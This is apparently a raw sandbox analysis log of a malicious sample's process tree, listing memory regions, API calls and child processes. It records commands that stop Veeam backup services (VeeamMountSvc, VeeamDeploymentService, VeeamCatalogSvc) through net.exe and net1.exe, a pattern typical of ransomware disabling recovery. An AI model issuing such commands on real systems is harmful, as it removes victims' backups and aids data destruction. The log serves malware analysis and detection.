"\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12050 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 12051 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 12052 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 12053 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12054 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 12055 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12056 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12057 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 12058 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 12059 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 870 os_tid = 0xd80 Process: id = "343" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x1f92c000" os_pid = "0xd0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop VeeamMountSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12076 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12077 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12078 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12079 start_va = 0x1b0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 12080 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12081 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 12082 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12083 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 12084 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12085 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 12086 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 12087 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 12088 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12089 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12090 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 12091 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12092 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 12093 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 12094 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 872 os_tid = 0x1018 Process: id = "344" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x50477000" os_pid = "0x32c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "339" os_parent_pid = "0x137c" cmd_line = "C:\\Windows\\system32\\net1 stop VeeamDeploymentService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12095 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12096 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12097 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12098 start_va = 0x90000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 12099 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12100 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 12101 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12102 start_va = 0xff930000 end_va = 0xff962fff entry_point = 0xff930000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 12103 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12104 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 12105 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 12106 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 12145 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12146 start_va = 0x110000 end_va = 0x176fff entry_point = 0x110000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12147 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 12148 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12149 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 12150 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 12151 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12192 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12193 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 12194 start_va = 0x4c0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 12195 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 12196 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 12197 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 12198 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 12199 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 12200 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 12201 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 12202 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 12203 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 12204 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 12205 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12206 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12207 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 12208 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 12209 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 12210 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 12212 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 874 os_tid = 0xa9c [0118.568] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10fab0 | out: lpSystemTimeAsFileTime=0x10fab0*(dwLowDateTime=0xfbd031d0, dwHighDateTime=0x1d48689)) [0118.568] GetCurrentProcessId () returned 0x32c [0118.568] GetCurrentThreadId () returned 0xa9c [0118.568] GetTickCount () returned 0x274e1 [0118.568] QueryPerformanceCounter (in: lpPerformanceCount=0x10fab8 | out: lpPerformanceCount=0x10fab8*=1816548600000) returned 1 [0118.569] GetModuleHandleW (lpModuleName=0x0) returned 0xff930000 [0118.569] __set_app_type (_Type=0x1) [0118.569] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff949c9c) returned 0x0 [0118.569] __getmainargs (in: _Argc=0xff954780, _Argv=0xff954790, _Env=0xff954788, _DoWildCard=0, _StartInfo=0xff95479c | out: _Argc=0xff954780, _Argv=0xff954790, _Env=0xff954788) returned 0 [0118.569] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0118.570] GetConsoleOutputCP () returned 0x1b5 [0118.570] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff95cec0 | out: lpCPInfo=0xff95cec0) returned 1 [0118.570] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0118.572] sprintf_s (in: _DstBuf=0x10fa58, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0118.572] setlocale (category=0, locale=".437") returned="English_United States.437" [0118.573] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0118.573] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0118.573] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamDeploymentService /y" [0118.574] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x10f7f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0118.574] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0118.574] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x10fa48 | out: Buffer=0x10fa48*=0x254d60) returned 0x0 [0118.574] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x10fa48 | out: Buffer=0x10fa48*=0x25c130) returned 0x0 [0118.574] _fileno (_File=0x7fefdba2a80) returned 0 [0118.574] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0118.574] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0118.574] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0118.574] _wcsicmp (_String1="config", _String2="stop") returned -16 [0118.574] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0118.574] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0118.575] _wcsicmp (_String1="file", _String2="stop") returned -13 [0118.575] _wcsicmp (_String1="files", _String2="stop") returned -13 [0118.575] _wcsicmp (_String1="group", _String2="stop") returned -12 [0118.575] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0118.575] _wcsicmp (_String1="help", _String2="stop") returned -11 [0118.575] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0118.575] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0118.575] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0118.575] _wcsicmp (_String1="session", _String2="stop") returned -15 [0118.575] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0118.575] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0118.575] _wcsicmp (_String1="share", _String2="stop") returned -12 [0118.575] _wcsicmp (_String1="start", _String2="stop") returned -14 [0118.575] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0118.575] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0118.576] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0118.576] _wcsicmp (_String1="accounts", _String2="VeeamDeploymentService") returned -21 [0118.576] _wcsicmp (_String1="computer", _String2="VeeamDeploymentService") returned -19 [0118.576] _wcsicmp (_String1="config", _String2="VeeamDeploymentService") returned -19 [0118.576] _wcsicmp (_String1="continue", _String2="VeeamDeploymentService") returned -19 [0118.576] _wcsicmp (_String1="cont", _String2="VeeamDeploymentService") returned -19 [0118.576] _wcsicmp (_String1="file", _String2="VeeamDeploymentService") returned -16 [0118.576] _wcsicmp (_String1="files", _String2="VeeamDeploymentService") returned -16 [0118.576] _wcsicmp (_String1="group", _String2="VeeamDeploymentService") returned -15 [0118.576] _wcsicmp (_String1="groups", _String2="VeeamDeploymentService") returned -15 [0118.576] _wcsicmp (_String1="help", _String2="VeeamDeploymentService") returned -14 [0118.576] _wcsicmp (_String1="helpmsg", _String2="VeeamDeploymentService") returned -14 [0118.576] _wcsicmp (_String1="localgroup", _String2="VeeamDeploymentService") returned -10 [0118.576] _wcsicmp (_String1="pause", _String2="VeeamDeploymentService") returned -6 [0118.576] _wcsicmp (_String1="session", _String2="VeeamDeploymentService") returned -3 [0118.576] _wcsicmp (_String1="sessions", _String2="VeeamDeploymentService") returned -3 [0118.576] _wcsicmp (_String1="sess", _String2="VeeamDeploymentService") returned -3 [0118.576] _wcsicmp (_String1="share", _String2="VeeamDeploymentService") returned -3 [0118.576] _wcsicmp (_String1="start", _String2="VeeamDeploymentService") returned -3 [0118.576] _wcsicmp (_String1="stats", _String2="VeeamDeploymentService") returned -3 [0118.576] _wcsicmp (_String1="statistics", _String2="VeeamDeploymentService") returned -3 [0118.576] _wcsicmp (_String1="stop", _String2="VeeamDeploymentService") returned -3 [0118.576] _wcsicmp (_String1="time", _String2="VeeamDeploymentService") returned -2 [0118.576] _wcsicmp (_String1="user", _String2="VeeamDeploymentService") returned -1 [0118.576] _wcsicmp (_String1="users", _String2="VeeamDeploymentService") returned -1 [0118.576] _wcsicmp (_String1="msg", _String2="VeeamDeploymentService") returned -9 [0118.576] _wcsicmp (_String1="messenger", _String2="VeeamDeploymentService") returned -9 [0118.576] _wcsicmp (_String1="receiver", _String2="VeeamDeploymentService") returned -4 [0118.576] _wcsicmp (_String1="rcv", _String2="VeeamDeploymentService") returned -4 [0118.577] _wcsicmp (_String1="netpopup", _String2="VeeamDeploymentService") returned -8 [0118.577] _wcsicmp (_String1="redirector", _String2="VeeamDeploymentService") returned -4 [0118.577] _wcsicmp (_String1="redir", _String2="VeeamDeploymentService") returned -4 [0118.577] _wcsicmp (_String1="rdr", _String2="VeeamDeploymentService") returned -4 [0118.577] _wcsicmp (_String1="workstation", _String2="VeeamDeploymentService") returned 1 [0118.577] _wcsicmp (_String1="work", _String2="VeeamDeploymentService") returned 1 [0118.577] _wcsicmp (_String1="wksta", _String2="VeeamDeploymentService") returned 1 [0118.577] _wcsicmp (_String1="prdr", _String2="VeeamDeploymentService") returned -6 [0118.577] _wcsicmp (_String1="devrdr", _String2="VeeamDeploymentService") returned -18 [0118.577] _wcsicmp (_String1="lanmanworkstation", _String2="VeeamDeploymentService") returned -10 [0118.577] _wcsicmp (_String1="server", _String2="VeeamDeploymentService") returned -3 [0118.577] _wcsicmp (_String1="svr", _String2="VeeamDeploymentService") returned -3 [0118.577] _wcsicmp (_String1="srv", _String2="VeeamDeploymentService") returned -3 [0118.577] _wcsicmp (_String1="lanmanserver", _String2="VeeamDeploymentService") returned -10 [0118.577] _wcsicmp (_String1="alerter", _String2="VeeamDeploymentService") returned -21 [0118.577] _wcsicmp (_String1="netlogon", _String2="VeeamDeploymentService") returned -8 [0118.577] _wcsupr (in: _String="VeeamDeploymentService" | out: _String="VEEAMDEPLOYMENTSERVICE") returned="VEEAMDEPLOYMENTSERVICE" [0118.577] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x25ce40 [0118.632] GetServiceKeyNameW (in: hSCManager=0x25ce40, lpDisplayName="VEEAMDEPLOYMENTSERVICE", lpServiceName=0xff955750, lpcchBuffer=0x10f968 | out: lpServiceName="", lpcchBuffer=0x10f968) returned 0 [0118.633] _wcsicmp (_String1="msg", _String2="VEEAMDEPLOYMENTSERVICE") returned -9 [0118.633] _wcsicmp (_String1="messenger", _String2="VEEAMDEPLOYMENTSERVICE") returned -9 [0118.633] _wcsicmp (_String1="receiver", _String2="VEEAMDEPLOYMENTSERVICE") returned -4 [0118.633] _wcsicmp (_String1="rcv", _String2="VEEAMDEPLOYMENTSERVICE") returned -4 [0118.633] _wcsicmp (_String1="redirector", _String2="VEEAMDEPLOYMENTSERVICE") returned -4 [0118.633] _wcsicmp (_String1="redir", _String2="VEEAMDEPLOYMENTSERVICE") returned -4 [0118.633] _wcsicmp (_String1="rdr", _String2="VEEAMDEPLOYMENTSERVICE") returned -4 [0118.633] _wcsicmp (_String1="workstation", _String2="VEEAMDEPLOYMENTSERVICE") returned 1 [0118.633] _wcsicmp (_String1="work", _String2="VEEAMDEPLOYMENTSERVICE") returned 1 [0118.633] _wcsicmp (_String1="wksta", _String2="VEEAMDEPLOYMENTSERVICE") returned 1 [0118.633] _wcsicmp (_String1="prdr", _String2="VEEAMDEPLOYMENTSERVICE") returned -6 [0118.633] _wcsicmp (_String1="devrdr", _String2="VEEAMDEPLOYMENTSERVICE") returned -18 [0118.633] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAMDEPLOYMENTSERVICE") returned -10 [0118.633] _wcsicmp (_String1="server", _String2="VEEAMDEPLOYMENTSERVICE") returned -3 [0118.633] _wcsicmp (_String1="svr", _String2="VEEAMDEPLOYMENTSERVICE") returned -3 [0118.633] _wcsicmp (_String1="srv", _String2="VEEAMDEPLOYMENTSERVICE") returned -3 [0118.633] _wcsicmp (_String1="lanmanserver", _String2="VEEAMDEPLOYMENTSERVICE") returned -10 [0118.633] _wcsicmp (_String1="alerter", _String2="VEEAMDEPLOYMENTSERVICE") returned -21 [0118.633] _wcsicmp (_String1="netlogon", _String2="VEEAMDEPLOYMENTSERVICE") returned -8 [0118.633] NetServiceControl (in: servername=0x0, service="VEEAMDEPLOYMENTSERVICE", opcode=0x0, arg=0x0, bufptr=0x10f970 | out: bufptr=0x10f970) returned 0x889 [0118.634] wcscpy_s (in: _Destination=0xff9580d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0118.634] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0118.635] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff955b50, nSize=0x800, Arguments=0xff957f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0118.637] GetFileType (hFile=0xb) returned 0x2 [0118.637] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x10f838 | out: lpMode=0x10f838) returned 1 [0118.638] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff955b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x10f830, lpReserved=0x0 | out: lpBuffer=0xff955b50*, lpNumberOfCharsWritten=0x10f830*=0x1e) returned 1 [0118.638] GetFileType (hFile=0xb) returned 0x2 [0118.638] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x10f838 | out: lpMode=0x10f838) returned 1 [0118.638] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff931efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x10f830, lpReserved=0x0 | out: lpBuffer=0xff931efc*, lpNumberOfCharsWritten=0x10f830*=0x2) returned 1 [0118.639] _ultow (in: _Dest=0x889, _Radix=1112224 | out: _Dest=0x889) returned="2185" [0118.639] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff955b50, nSize=0x800, Arguments=0xff957f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0118.639] GetFileType (hFile=0xb) returned 0x2 [0118.639] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x10f838 | out: lpMode=0x10f838) returned 1 [0118.639] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff955b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x10f830, lpReserved=0x0 | out: lpBuffer=0xff955b50*, lpNumberOfCharsWritten=0x10f830*=0x34) returned 1 [0118.640] GetFileType (hFile=0xb) returned 0x2 [0118.640] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x10f838 | out: lpMode=0x10f838) returned 1 [0118.640] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff931efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x10f830, lpReserved=0x0 | out: lpBuffer=0xff931efc*, lpNumberOfCharsWritten=0x10f830*=0x2) returned 1 [0118.641] NetApiBufferFree (Buffer=0x254d60) returned 0x0 [0118.641] NetApiBufferFree (Buffer=0x25c130) returned 0x0 [0118.641] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamDeploymentService /y" [0118.641] exit (_Code=2) Process: id = "345" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x4ed9a000" os_pid = "0x1040" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "336" os_parent_pid = "0xc5c" cmd_line = "C:\\Windows\\system32\\net1 stop VeeamCatalogSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12107 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12108 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12109 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12110 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 12111 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12112 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 12113 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" 